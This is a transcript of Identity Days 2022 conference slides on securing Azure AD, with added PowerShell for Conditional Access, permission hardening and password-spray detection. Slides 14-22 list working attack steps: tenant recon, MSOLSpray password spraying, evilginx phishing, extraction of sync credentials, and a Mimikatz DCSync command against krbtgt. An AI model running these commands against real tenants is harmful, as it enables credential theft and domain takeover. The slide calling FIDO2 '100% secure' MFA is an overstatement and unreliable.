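The “verification of each access attempt” of slides 12 and 13 is enforced in Azure AD by Conditional Access. The following PowerShell is an added example written for this page, not code from the deck or from Microsoft: it creates a policy that requires MFA for all users on all applications through the Microsoft Graph PowerShell SDK, starting in report-only mode. The group name `BreakGlass-Accounts` and the policy display name are assumptions; the group is expected to hold the emergency-access accounts, which must be excluded so that a misconfigured policy cannot lock the tenant out.

```powershell
# Added example (not from the Identity Days deck): create an Azure AD Conditional Access
# policy that re-verifies every access attempt by requiring MFA for all users on all apps.
# Assumptions: Microsoft.Graph PowerShell SDK is installed; the caller holds
# Policy.ReadWrite.ConditionalAccess and Group.Read.All; $BreakGlassGroupId is a
# hypothetical group holding the emergency-access accounts, which stay out of MFA policies.
Import-Module Microsoft.Graph.Identity.SignIns

function New-RequireMfaPolicy {
    param(
        [Parameter(Mandatory)] [string] $BreakGlassGroupId,
        [string] $DisplayName = "ZT-01 Require MFA for all users",   # hypothetical name
        # Report-only first: the sign-in log then shows who WOULD be blocked, so the
        # policy can be reviewed before switching it to "enabled".
        [ValidateSet("enabledForReportingButNotEnforced", "enabled")]
        [string] $State = "enabledForReportingButNotEnforced"
    )

    $body = @{
        displayName = $DisplayName
        state       = $State
        conditions  = @{
            users = @{
                includeUsers  = @("All")
                excludeGroups = @($BreakGlassGroupId)   # emergency accounts are excluded
            }
            applications   = @{ includeApplications = @("All") }
            # "all" covers legacy clients too; they cannot satisfy MFA and are
            # therefore effectively blocked once the policy is enforced.
            clientAppTypes = @("all")
        }
        grantControls = @{
            operator        = "OR"
            builtInControls = @("mfa")
        }
    }

    return New-MgIdentityConditionalAccessPolicy -BodyParameter $body -ErrorAction Stop
}

Connect-MgGraph -Scopes "Policy.ReadWrite.ConditionalAccess", "Group.Read.All"

# Resolve the break-glass group first; refuse to create a tenant-wide policy without it.
$bg = @(Get-MgGroup -Filter "displayName eq 'BreakGlass-Accounts'")
if ($bg.Count -ne 1) { throw "Expected exactly one 'BreakGlass-Accounts' group, found $($bg.Count)" }

$policy = New-RequireMfaPolicy -BreakGlassGroupId $bg[0].Id
"Created policy '$($policy.DisplayName)' in state '$($policy.State)'"
```

Leave the policy in report-only mode for a few days, review the “Report-only” result column of the sign-in log, then re-run with `-State enabled`. The exclusion of the recovery accounts is the same requirement that slide 28 states for the two cloud-only recovery accounts (no MFA on them).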
  • 14. Azure AD Kill Chain ✨😯
  • 15. Azure AD Kill Chain: how to get started 😊
  • 16. Azure AD Kill Chain: step-by-step progression 😯
       1. Azure AD non-authenticated discovery
       2. Search for a valid e-mail account
       3. Password spraying attack
       4. Change to a user-authenticated session
       5. Accounts: list synchronized and cloud accounts
       6. Azure AD Connect: find Sync_Sync01_guid@domain.onmicrosoft.com and the AAD Connect VM name in the MSOL account
       7. Now, by default, all is possible!
       8. If you become a local Administrator on AAD Connect, you can extract an encrypted version of the MSOL account passwords via the AAD Connect SQL database or directly from LSASS.exe using the Mimikatz tool!
       9. From there, it is possible to carry out a DCSync attack to replicate all the password hashes of the AD domain! 😯
       10. And finally, via Active Directory, exploit the AAD SSO features by recovering the PASSWORD of AZUREADSSOACC$. Or, at this point, access the Azure portal without providing a password.
       So, the Azure AD Connect VM must be super secure.
  • 17. Azure AD Kill Chain: tenant discovery 😯
       https://login.microsoftonline.com/getuserrealm.srf?login=[USERNAME@DOMAIN]&xml=1
       😯 1st info available anonymously, without authentication 😯
       About your tenant: Active or not? Name? Federated or not?
  • 18. Azure AD Kill Chain: tenant discovery 😯
       Discovery and recon of an Azure tenant. Free PowerShell modules to install: GitHub - Gerenios/AADInternals: AADInternals PowerShell module for administering Azure AD and Office 365
       Get tenant name, branding and DNS name: Get-AADIntLoginInformation -UserName xxxx.domain.onmicrosoft.com
       Get tenant ID: Get-AADIntTenantID -Domain testtenant.onmicrosoft.com
       Get all additional domains added: Get-AADIntTenantDomains -Domain testtenant.onmicrosoft.com
       Get general tenant info: Invoke-AADIntReconAsOutsider -DomainName testtenant.onmicrosoft.com
       😯 Third-party PowerShell modules to find more... 😯
  • 19. Azure AD Kill Chain: initial access + password spray / brute force 😯
       MSOL Spray tool: https://github.com/dafthack/MSOLSpray
       Import-Module MSOLSpray.ps1
       Invoke-MSOLSpray -UserList .\userlist.txt -Password IdentityDays$Paris%2022
       Basic sample password files are available here: https://github.com/ohmybahgosh/RockYou2021.txt
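On the defensive side of slide 19, a password spray looks different from a brute force: one source tries one or two passwords across many accounts, so the signal is “many distinct users failing from one IP in a short window”, not many failures per user. The script below is an added example for this page, not part of the deck: it applies that rule to records shaped like the Microsoft Graph `signIn` resource (`userPrincipalName`, `ipAddress`, `createdDateTime`, `status.errorCode`). The sample records, the IP addresses and the `contoso.example` UPNs are constructed; the threshold values are assumptions to tune per tenant.

```powershell
# Added example (not from the Identity Days deck): flag password-spray behaviour in
# Azure AD sign-in records. 50126 is Azure AD's "invalid username or password" error code.
# Assumptions: records shaped like the Graph signIn resource; thresholds are tunable.

function Find-PasswordSpray {
    param(
        [Parameter(Mandatory)] [object[]] $SignIns,
        [int] $MinDistinctUsers = 5,     # distinct accounts failing from one IP
        [int] $WindowMinutes    = 60     # ... within this time span
    )
    $failures = $SignIns | Where-Object { $_.status.errorCode -eq 50126 }
    $findings = @()
    foreach ($group in ($failures | Group-Object ipAddress)) {
        $events = @($group.Group | Sort-Object { [datetime]$_.createdDateTime })
        $first  = [datetime]$events[0].createdDateTime
        $last   = [datetime]$events[-1].createdDateTime
        $users  = @($events | Select-Object -ExpandProperty userPrincipalName -Unique)
        if ($users.Count -ge $MinDistinctUsers -and ($last - $first).TotalMinutes -le $WindowMinutes) {
            $findings += [pscustomobject]@{
                IPAddress     = $group.Name
                DistinctUsers = $users.Count
                Attempts      = $events.Count
                FirstSeen     = $first
                LastSeen      = $last
            }
        }
    }
    return $findings
}

# Constructed sample: six different users hit from 203.0.113.10 within three minutes
# (a spray), plus one user mistyping her own password three times from 198.51.100.7
# (not a spray: one account, so it never reaches MinDistinctUsers).
$base   = Get-Date "2022-10-27T08:00:00Z"
$sample = @(
    1..6 | ForEach-Object {
        [pscustomobject]@{
            userPrincipalName = "user$_@contoso.example"
            ipAddress         = "203.0.113.10"
            createdDateTime   = $base.AddSeconds(30 * $_).ToString("o")
            status            = @{ errorCode = 50126 }
        }
    }
    1..3 | ForEach-Object {
        [pscustomobject]@{
            userPrincipalName = "alice@contoso.example"
            ipAddress         = "198.51.100.7"
            createdDateTime   = $base.AddMinutes(10).AddSeconds(20 * $_).ToString("o")
            status            = @{ errorCode = 50126 }
        }
    }
)

# Expected: one finding for 203.0.113.10 (6 distinct users, 6 attempts); none for 198.51.100.7.
Find-PasswordSpray -SignIns $sample | Format-Table -AutoSize
```

Against a real tenant, feed `Find-PasswordSpray` the output of `Get-MgAuditLogSignIn` (Microsoft Graph PowerShell SDK, `AuditLog.Read.All`) instead of `$sample`; the same grouping expressed over the `SigninLogs` table is what a scheduled analytics rule in Azure Sentinel would run. Smart Lockout (slide 28) limits how far a spray gets per account, but it does not tell you a spray is happening; this detection does.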
  • 20. Azure AD Kill Chain: MFA attack + MFA fatigue 😯
       Phishing & man-in-the-middle: https://github.com/kgretzky/evilginx
       27/09/2022: MFA fatigue leads to breach of UBER’s corporate users: https://veruscorp.com/mfa-fatigue-leads-to-breach-of-ubers-corporate-systems/
       Using FIDO2 hardware keys like YubiKey provides 100% secure MFA
  • 21. Azure AD Kill Chain: enumeration 😯
       AzureAD PowerShell module (PowerShell Gallery | AzureAD 2.0.2.140), usable with a standard user, without special privileges!
       Install-Module -Name AzureAD
       Connect-AzureAD
       Session state and details: Get-AzureADCurrentSessionInfo
       Tenant details: Get-AzureADTenantDetail
       List all AAD users: Get-AzureADUser -All $true
       Get specific user properties: Get-AzureADUser -ObjectId test@tenanttest.onmicrosoft.com
       Get users whose name contains “admin”: Get-AzureADUser -SearchString "admin"
       Get all groups whose name contains “admin”: Get-AzureADGroup -All $true | ?{$_.DisplayName -match "admin"}
       Get all groups synchronized from AD to AAD: Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null}
       Get all cloud-only Azure AD groups: Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null}
       Get all users with the Global Administrator role: Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
       Get all Intune-managed (compliant) devices: Get-AzureADDevice -All $true | ?{$_.IsCompliant -eq "True"}
       Get all registered apps: Get-AzureADApplication -All $true
       Other useful tools: via Azure portal; via PowerShell; via Azure CLI
       Warning: by default, an AAD user can 😯
       - Access the list of all users, groups, applications, devices, roles, subscriptions
       - Send invitations to Guest type accounts
       - Create security groups
       - Read group members
       - Create a new app
       - Add up to 50 Azure AD devices
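Most of what slide 21 enumerates is readable because of the tenant’s default user permissions, and the warning at the end of the slide (any user can create apps, create security groups and invite guests) is a setting, not a fact of life. The script below is an added example written for this page, not the deck’s own code: it reads the Azure AD authorization policy through the Microsoft Graph PowerShell SDK, reports which of those defaults are still open, and, only when `-Apply` is given, tightens them. Directory read access (`allowedToReadOtherUsers`) is deliberately left untouched; the reason is in the comment.

```powershell
# Added example (not from the Identity Days deck): review and tighten what a plain Azure AD
# user may do by default (register apps, create security groups, invite guests).
# Assumptions: Microsoft.Graph PowerShell SDK installed; the caller holds
# Policy.ReadWrite.Authorization. Run without -Apply first to see the current state.

function Get-DefaultUserPermissionFindings {
    # Pure check over an authorizationPolicy object; returns one string per open default.
    param([Parameter(Mandatory)] $AuthorizationPolicy)
    $perm     = $AuthorizationPolicy.DefaultUserRolePermissions
    $findings = @()
    if ($perm.AllowedToCreateApps) {
        $findings += "Any user can register applications (allowedToCreateApps = true)"
    }
    if ($perm.AllowedToCreateSecurityGroups) {
        $findings += "Any user can create security groups (allowedToCreateSecurityGroups = true)"
    }
    if ($AuthorizationPolicy.AllowInvitesFrom -eq "everyone") {
        $findings += "Any user, guests included, can invite external guests (allowInvitesFrom = everyone)"
    }
    return $findings
}

function Set-HardenedDefaultUserPermissions {
    param([switch] $Apply)
    $policy   = Get-MgPolicyAuthorizationPolicy
    $findings = @(Get-DefaultUserPermissionFindings -AuthorizationPolicy $policy)
    if ($findings.Count -eq 0) { return "Default user permissions are already restricted" }

    $findings | ForEach-Object { "FINDING: $_" }
    if (-not $Apply) { return "Re-run with -Apply to remediate" }

    # allowedToReadOtherUsers is left as-is on purpose: switching it off breaks people
    # pickers, Teams and many apps, and it does not stop an attacker who already holds
    # a privileged token. The three settings below remove capabilities, not visibility.
    $body = @{
        defaultUserRolePermissions = @{
            allowedToCreateApps           = $false
            allowedToCreateSecurityGroups = $false
        }
        allowInvitesFrom = "adminsAndGuestInviters"   # admins and the Guest Inviter role only
    }
    Update-MgPolicyAuthorizationPolicy -AuthorizationPolicyId "authorizationPolicy" `
        -BodyParameter $body -ErrorAction Stop
    return "Applied"
}

Connect-MgGraph -Scopes "Policy.ReadWrite.Authorization"
Set-HardenedDefaultUserPermissions            # review only
# Set-HardenedDefaultUserPermissions -Apply   # remediate after review
```

Turning off self-service app registration means developers need the Application Developer role, so pair the change with a process for granting it; the device quota the slide mentions (50 devices per user) lives in the device settings rather than in this policy and is not covered here.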
  • 22. Azure AD Kill Chain: And finally, use of MSOL_* credentials 😯
     Enumeration via the AD PowerShell module: Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties * | select SamAccountName,Description | fl
     Enumeration via the Azure AD PowerShell module: Get-AzureADUser -All $true | ?{$_.UserPrincipalName -match "Sync_"}
     Once AAD Connect has been analyzed, the credentials are extracted: Get-AADIntSyncCredentials
     The end: MSOL_* account credential + DCSync attack with MIMIKATZ
       runas /netonly /user:amslab.corp\MSOL_782bef6aa0a9 cmd
       Invoke-Mimikatz -Command "lsadump::dcsync /user:amsLab\krbtgt /domain:amsLab.corp /dc:DC01.amsLab.corp"
  • 23. Azure AD Hardening ✨👍
  • 24. Azure AD Hardening: inspired by Microsoft Entra, based on customer experience
     Security projects
     Assessment / audit missions
     Emergency operations
     Remediation
  • 25. Azure AD Hardening: Always start with Azure AD Quick Wins 👍 (based on customer experience:  Security projects  Assessment / audit missions  Emergency operations  Remediation)
  • 26. Azure AD Hardening: Always start with Azure AD Quick Wins 👍
  • 27. Azure AD Hardening Part 1: Enforce your Secrets
  • 28. Azure AD Hardening Part 1: Enforce your Secrets
    1. Use Microsoft Secure Score
       Deploy MFA for EVERYONE
       Enable Identity Protection (P2)
    2. Use Azure AD Smart Lockout
       For Azure AD cloud accounts
       For hybrid accounts
    3. Deploy Passwordless authentication
       FIDO2 key
       Microsoft Authenticator
    4. Create TWO recovery accounts
       Only in Azure AD
       Do not enable synchronization
       Do not use MFA
       Do not use FIDO2 keys
       Disable password expiration
       Activate a strong audit on these two accounts with: Azure Log Analytics, Azure Sentinel, Cloud App Security (MCAS)
  • 29. Azure AD Hardening Part 1: Hardening Azure MFA
    1. MFA Protection
    2. Auth Strengths
    3. MFA Fraud alert
    4. Identity Protection
  • 30. Azure AD Hardening Part 2: Conditional Access Design
    Scope audience:  Regular users  High-privilege users  Guest / external users  Workload identities
    Logical separation in AAD brings:  Flexibility  Granularity  Lower risk of error  More "readability"  Troubleshooting  Governance
  • 31. Azure AD Hardening Part 2: Conditional Access Design
    Best practices:  Always test behavior  What if?  Report-only mode
    Area: Authentication Policies
      - Enforce MFA for all administrators
      - Enforce MFA for all standard users
      - Enforce MFA for all Guest users
      - Block legacy authentication
      - Reduce attack surface
    Area: Device Access Policies
      - Block unsupported device platforms
      - Require managed devices (Endpoint Manager) for admin stations
      - Require approved app for mobile access (MAM)
      - Require managed devices
      - Specific Conditional Access for macOS (if needed)
    Area: Strict Security Policies
      - Block MFA registration from untrusted locations
      - Require Terms of use for: all administrators / Guest access / consultants
      - Control sign-in frequency
      - Disable persistent browser
      - Block foreign locations
      - Require trusted location for all admins
      - User risk-based and sign-in risk-based policies (via Identity Protection)
      - Authentication context: PIM / MIP-labeled SharePoint site / Cloud App Security upload and download
      - Privileged access via filters for devices
      - Conditional Access for workload identities
      - Block all cloud apps except Teams / SPO for Guest access
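The "Block legacy authentication" policy from the table above, created in report-only mode first ("Always test behavior") with the two cloud-only recovery accounts from Part 1 excluded, as an added example written for this transcript rather than the speakers' own code. It assumes the Microsoft Graph PowerShell SDK (Microsoft.Graph.Identity.SignIns and Microsoft.Graph.Reports modules); the two object IDs are placeholders for your break-glass accounts.

```powershell
# Added example (not from the talk): block legacy auth in report-only mode,
# excluding the two recovery (break-glass) accounts, via Microsoft Graph PowerShell.
$breakGlassIds = @(
    '00000000-0000-0000-0000-000000000001',   # placeholder: recovery account 1 object ID
    '00000000-0000-0000-0000-000000000002'    # placeholder: recovery account 2 object ID
)

Connect-MgGraph -Scopes 'Policy.ReadWrite.ConditionalAccess', 'AuditLog.Read.All', 'Directory.Read.All'

$policy = @{
    displayName = 'CA001 - Block legacy authentication (report-only)'
    # Report-only: sign-in logs record what WOULD have been blocked, nobody is
    # impacted yet. Switch to 'enabled' only after reviewing those results.
    state       = 'enabledForReportingButNotEnforced'
    conditions  = @{
        users = @{
            includeUsers = @('All')
            excludeUsers = $breakGlassIds      # never lock the recovery accounts out
        }
        applications = @{ includeApplications = @('All') }
        # Legacy protocols: Exchange ActiveSync and "other clients" (IMAP/POP/SMTP AUTH,
        # older Office clients), i.e. the ones that cannot complete MFA.
        clientAppTypes = @('exchangeActiveSync', 'other')
    }
    grantControls = @{
        operator        = 'OR'
        builtInControls = @('block')
    }
}

$created = New-MgIdentityConditionalAccessPolicy -BodyParameter $policy
"Created policy $($created.Id) in state $($created.State)"

# Review phase: list recent sign-ins the new policy would have blocked. Report-only
# outcomes are recorded per sign-in under appliedConditionalAccessPolicies.
Get-MgAuditLogSignIn -Top 200 |
    Where-Object {
        $_.AppliedConditionalAccessPolicies |
            Where-Object { $_.Id -eq $created.Id -and $_.Result -eq 'reportOnlyFailure' }
    } |
    Select-Object CreatedDateTime, UserPrincipalName, ClientAppUsed |
    Format-Table
```

Users that show up in the review list still depend on a legacy protocol and need a modern client or app password alternative before the policy is switched to enforced.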
  • 32. Azure AD Hardening Part 3: Use PIM (Privileged Identity Management, Azure AD P2)
    PIM best practices:
     Enable PIM for privileged accounts
     Enable PIM for all admin roles (Zero Trust)
     Configure each role with MFA
     For a Global Admin account, grant 2 h max (Zero Trust)
     Think about the default duration: permanent for partners
     Configure email notifications to track usage
     Configure Access Reviews for PIM every week
     Activate the Privileged Access group
  • 33. Azure AD Hardening Part 4: Use Microsoft Defender for Identity
    Why use Microsoft Defender for Identity?
     Hyperscale SaaS protection in Azure
     Defender for Cloud Apps integration
     Multi-forest support
     Detection of DC Shadow
     Continuous updates in SaaS mode
     ATA Sensor & ATA Sensor Standalone
     Included with EMS E5, M365 E5 and M365 Security E5
  • 34. Azure AD Hardening Part 5: Identity Governance - Use new Defender for Identity workflows
    Workflow steps shown on the slide:
     Start date
     Create user account (status: disabled)
     Enable user account
     Generate Temporary Access Pass (TAP)
     Send email to hiring manager with TAP
     Group assignments
     Send welcome email to new hire
     Send email to onboarding DL
     Add user to Teams "New Hires" channel
     Launch custom Logic Apps workflow
  • 35. Azure AD Hardening Part 6: Management of External Identities and Collaboration
  • 36. Azure AD Hardening Part 6: External Identities and the new Cross-tenant feature
    New Cross-tenant feature best practices:
     Use case 1: Configure B2B Collaboration
     Use case 2: Configure B2B Direct Connect
     Configure Inbound in granular mode with MFA + trust compliant device claims
     Configure Outbound with granularity and scope your groups
     Block all B2B collaboration Outbound by default
     Use the Shared Channel
  • 37. Azure AD Hardening Part 7: Protect yourself against Guest and External users with 9 control points
    ID | Action | Impact
    01 | Dedicated Conditional Access for MFA | Medium
    02 | Dynamic group including all External / Guest users | Low
    03 | CA hardening: block all cloud apps except Teams / SPO | High
    04 | CA Terms of use | Medium
    05 | Restriction: prevent download, web-only access for sensitive Teams / SharePoint sites | High
    06 | Session timeout (daily MFA / authentication) | High
    07 | Access review for guest accounts | Medium
    08 | Sensitivity labels for M365 groups (Teams and SharePoint Online) | High
    09 | Dedicated audit log for Guest / External user access | High
  • 38. Azure AD Hardening Part 8: Protect your Workload Identities
    68% of workload identities can access sensitive data and assets
    Human identities vs. machine identities: about 5 machine IDs for 1 human ID
    Sources: SCIM Quarterly Analysis, July 7th, 2022; Microsoft Security internal research 2021
  • 39. Azure AD Hardening Part 8: Protect your Workload Identities
    Human identities vs. machine identities, future: about 20 machine IDs for 1 human ID
     1: Deploy Access Reviews for SPNs
     2: Configure CAs for workload identities
     3: Deploy AAD Identity Protection
     4: Set up the User Consent workflow
     5: Audit and log with Defender for Cloud Apps / Azure Sentinel
  • 40. Azure AD Hardening Part 9: Management of External Identities and collaboration
  • 41. Azure AD Hardening Part 10: To go beyond…
    User Access Strategy
     User admin (cloud only)
     PIM with the necessary rights: Global Admin: 2 h; other: 4 h
     MFA / Passwordless FIDO2
     Conditional Access: scope User Admins; exclude Break Glass accounts; device: Windows; location: Trusted Location; approve: require device to be marked as compliant
     Identity Protection: sign-in risk, user risk
     Password Protection
    Privileged Access Workstation
     Azure AD Autopilot profile
     Compliance with Endpoint Manager
     Security & Hardening Device Profile
     Security Baseline
     Deny BYOD
     Windows Update setup
     Defender for Endpoint: integration with Endpoint Manager
  • 42. Azure AD Hardening Part 11: The tomorrow model... Enterprise Access model
     Tier 0: Access Control Plane, Management
     Tier 1: Management Plane, Data management, Application
     Tier 2: User access, Application access (API, …)
  • 43. Azure AD Hardening Part 12: SecOps
    A SecOps implementation is essential:
     Management of unified alerts
     Management of unified incidents
     Log management / redirection
     Proactivity
     Automatic playbook trigger via Sentinel (remember to add the Azure AD data connectors)
     Remember to have a real Detection / Hunting and Response strategy
     Don't forget "Hunting" with KQL
     Use the Microsoft 365 Defender "Admin Center"
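The "Hunting" point above, applied to the password-spray step of the kill chain (slide 19) from the defender's side, as an added example that is not from the talk: one source IP, many distinct accounts, only one or two failures each, then a success from the same source. The sign-in sample is constructed in the shape of the Azure AD sign-in log fields (replace it with a SigninLogs export or Get-MgAuditLogSignIn output), and Find-PasswordSpray is a hypothetical helper.

```powershell
# Added example (not from the talk). Constructed sample shaped like Azure AD
# sign-in log fields; swap in a real export to hunt in your own tenant.
$sample = @(
    @{ Time='2022-10-27T08:00:01Z'; User='alice@contoso.com'; IP='203.0.113.10'; ErrorCode=50126 }
    @{ Time='2022-10-27T08:00:04Z'; User='bob@contoso.com';   IP='203.0.113.10'; ErrorCode=50126 }
    @{ Time='2022-10-27T08:00:07Z'; User='carol@contoso.com'; IP='203.0.113.10'; ErrorCode=50126 }
    @{ Time='2022-10-27T08:00:10Z'; User='dave@contoso.com';  IP='203.0.113.10'; ErrorCode=50126 }
    @{ Time='2022-10-27T08:00:13Z'; User='erin@contoso.com';  IP='203.0.113.10'; ErrorCode=50053 }
    @{ Time='2022-10-27T08:00:16Z'; User='frank@contoso.com'; IP='203.0.113.10'; ErrorCode=0 }
    @{ Time='2022-10-27T08:05:00Z'; User='grace@contoso.com'; IP='198.51.100.7'; ErrorCode=50126 }
    @{ Time='2022-10-27T08:05:30Z'; User='grace@contoso.com'; IP='198.51.100.7'; ErrorCode=50126 }
    @{ Time='2022-10-27T08:06:00Z'; User='grace@contoso.com'; IP='198.51.100.7'; ErrorCode=0 }
) | ForEach-Object { [pscustomobject]$_ }

# Hypothetical helper: spray = one source IP, many distinct accounts, few tries
# per account (the opposite of a brute force hammering a single account).
function Find-PasswordSpray {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $MinDistinctUsers   = 5,
        [int] $MaxFailuresPerUser = 2
    )
    # AADSTS codes: 50126 = invalid username or password, 50053 = Smart Lockout hit
    $failureCodes = 50126, 50053
    $Events |
        Where-Object { $failureCodes -contains [int]$_.ErrorCode } |
        Group-Object -Property IP |
        ForEach-Object {
            $group    = $_
            $perUser  = @($group.Group | Group-Object -Property User)
            $maxTries = ($perUser | Measure-Object -Property Count -Maximum).Maximum
            if ($perUser.Count -lt $MinDistinctUsers -or $maxTries -gt $MaxFailuresPerUser) { return }
            # A success from the same source after the spray is the account to contain first
            $succeeded = @($Events | Where-Object { $_.IP -eq $group.Name -and [int]$_.ErrorCode -eq 0 } |
                           ForEach-Object { $_.User })
            [pscustomobject]@{
                IP             = $group.Name
                DistinctUsers  = $perUser.Count
                Failures       = $group.Count
                LockedOut      = @($group.Group | Where-Object { [int]$_.ErrorCode -eq 50053 }).Count
                SucceededAfter = $succeeded -join ', '
                FirstSeen      = ($group.Group.Time | Sort-Object)[0]
                LastSeen       = ($group.Group.Time | Sort-Object)[-1]
            }
        }
}

Find-PasswordSpray -Events $sample | Format-List
```

On the constructed sample only 203.0.113.10 is reported (5 distinct users, 1 Smart Lockout hit, frank@contoso.com succeeded afterwards); grace's repeated failures from 198.51.100.7 are a single-account pattern and are not flagged.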
  • 44. Conclusion
  • 45. Zero Trust smooth deployment in 12 steps
    Think hybrid and protect your on-premises Active Directory environment!
    1. Use Azure AD as your IAM
    2. Manage Identity and Access
    3. Provision users
    4. Control all authentications
    5. Implement strong and secure auths
    6. Evaluate authentications and credentials
    7. Determine Trusted Zones
    8. Determine Resource Access
    9. Apply minimum privileges
    10. Secure administrative rights
    11. Take advantage of Conditional Access
    12. Train continuously!
     Modernize identity and device management
     Consolidation, then legacy infrastructure cleanup
     Configure secure access for all types of users
     Secure your hybrid environment
     Strong authentications, conditional access and intelligent strategies
     Secure experience for all users
  • 46. Finally, our Zero Trust "To-do list"
    Microsoft Documentation!
     Zero Trust Document Center: https://docs.microsoft.com/en-us/security/zero-trust/
     Monitor your Azure AD Secure Score: https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/identity-secure-score
     Integrate your Apps into Azure AD: https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/plan-an-application-integration
     Security Update Guide: Patch and patch again! https://msrc.microsoft.com/update-guide/
    Azure AD / Active Directory
     Enable PHS and do not use PTA or ADFS federation
     Enable Seamless SSO and minimize the use of ADFS on-premises
     Azure MFA + Passwordless with FIDO2 (Yubico, …)
     Use PIM for IT teams
     Use Azure AD Identity Protection for everyone
    Privileged Accounts | backup accounts | MFA | Passwordless
    Conditional Access
     MFA for Guests
     MFA for everyone
     Access policies and trusted locations
     Test | What If?
    Reports - SecOps
     Devices
     Azure AD logs (sign-ins and applications)
     Users at risk: logins, locations, IP, GPS
     Cloud App Security
     Azure Sentinel
    Passwords
     SSPR
     Smart Lockout
     Azure AD / Active Directory Password Protection
    Education & Communication with Users
     Internal training / Cyber best practices
  • 47. Thanks to all our partners! @IdentityDays #identitydays2022 - Thank you all ✨👍